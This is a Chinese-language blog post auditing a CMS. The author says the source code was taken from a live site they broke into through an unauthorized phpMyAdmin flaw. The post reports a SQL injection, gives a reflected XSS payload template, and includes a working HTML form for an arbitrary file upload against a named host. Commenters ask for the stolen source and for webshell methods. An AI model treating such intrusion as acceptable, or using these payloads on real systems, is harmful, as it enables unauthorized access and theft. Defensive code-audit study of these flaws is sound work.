MENU

某cms审计

August 24, 2020 • 渗透测试

前言

昨天爆出了宝塔的未授权访问phpmyadmin漏洞,然后随后撸了一个站,脱下了源码,今日审计一波,来分享一下,水一篇文章

首先看看网站啥样子吧

image-20200824123355736

哇! 流口水辽

环境搭建

phpstudy+Vs code +burp

把程序放在wwwroot下,导入一下数据库

image-20200824155631065

然后捏,修改一下数据库配置文件

E:/phpStudy/PHPTutorial/WWW/bc/include/PxfaizySql.php

image-20200824123902400

好滴,简单搭建结束,还不会搭建的建议去百度学习一下,因为我就是为了凑个字数~

代码审计

首先看到网站程序架构(adminer.php是我自己传的)

image-20200824124100005

好的,没啥东西,告辞,开审

前台sql注入

看到rule.html ,发现给ajax.php 发起了一个请求

image-20200824124446938

跟踪过去发现直接将id给传到了execute_query方法,没有任何过滤,好滴,喜提一枚sql注入,

image-20200824124630567

验证:

正常请求 :

image-20200824124935019

发送payload 延时:

image-20200824124845273

反射xss

还是同一个文件,在第七十行,可以看到参数用引号闭合了,不存在sqli,但是直接拼接到html页面,造成了xss

image-20200824150023941

payload:

ajax.php?action=form&act_id=81">弹窗代码

任意文件上传

文件位置:E:/phpStudy/PHPTutorial/WWW/bc/manager/manage_do.php

代码:

1.png

这段代码就是获取上传的文件传入upload_file方法,跟踪这个方法,来到了

E:/phpStudy/PHPTutorial/WWW/bc/include/common.fun.php

代码:

2.png

可以看到这个函数的代码,并没有对上传的文件进行任何的限制,直接就可以上传任意文件,那么构造poc

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>任意文件上传</title>
</head>
<body>
<form action="http://www.bc.com/manager/manage_do.php?do_post=upload_image" method="post" enctype="multipart/form-data">
    文件:<input type="file" name="image_file" value="123"><br>
              <input type="submit" name="mufile">
</form>
</body>
</html>

测试上传成功

Leave a Comment

5 Comments
  1. 居然这么久没更新了 哎。。。

    1. kuaile

      @心灵鸡汤君师傅分享一下源码吗

    2. k神的小老弟

      @心灵鸡汤君居然更新喽:))

  2. Art1st

    tql,可以要份源码吗

  3. 天涯

    请问下这个是如何通过phpmyadmin 获得webshell 脱下源码的?